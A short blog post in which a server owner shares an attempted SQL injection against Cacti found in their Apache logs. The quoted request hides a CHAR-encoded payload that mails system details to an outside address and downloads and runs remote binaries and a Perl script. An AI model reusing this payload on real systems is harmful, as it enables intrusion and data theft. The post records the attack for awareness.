Uncategorized

Cacti SQL injection attack

I was going through some apache access logs this morning and came across an attempted SQL injection attack. I don’t have Cacti on my server, so I wasn’t affected by the attempt. Here’s the request:

24.147.54.90 - - [04/Feb/2008:23:25:30 -0700] "GET /cacti/cmd.php?1+1111)/**/UNION/**/SELECT/**/2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,
CHAR(112,114,111,99),null,1,300,0,CHAR(32,47,115,98,105,110,47,105,102,99,111,110,102,105,103,32,124,32,
103,114,101,112,32,105,110,101,116,32,62,32,47,116,109,112,47,111,117,116,59,32,117,110,97,109,101,32,45,
97,32,62,62,32,47,116,109,112,47,111,117,116,59,32,117,112,116,105,109,101,32,62,62,32,47,116,109,112,47,
111,117,116,59,32,99,97,116,32,47,116,109,112,47,111,117,116,32,124,32,109,97,105,108,32,45,115,32,54,54,
46,49,56,48,46,49,55,50,46,51,56,32,104,97,99,107,101,100,32,97,108,101,120,97,97,97,56,57,64,121,97,104,
111,111,46,99,111,109,59,119,103,101,116,32,119,119,119,46,97,108,101,120,117,116,122,46,97,115,46,114,
111,47,116,32,45,79,32,47,116,109,112,47,116,59,99,104,109,111,100,32,43,120,32,47,116,109,112,47,116,59,
47,116,109,112,47,116,59,119,103,101,116,32,119,119,119,46,97,108,101,120,117,116,122,46,97,115,46,114,
111,47,116,46,112,108,32,45,79,32,47,116,109,112,47,116,46,112,108,59,112,101,114,108,32,47,116,109,112,
47,116,46,112,108,32,62,32,46,47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null/**/FROM
/**/host/*+11111 HTTP/1.0" 200 642 "-" "-"

It looks like someone out there has an automated bot going around attempting this injection attack everywhere.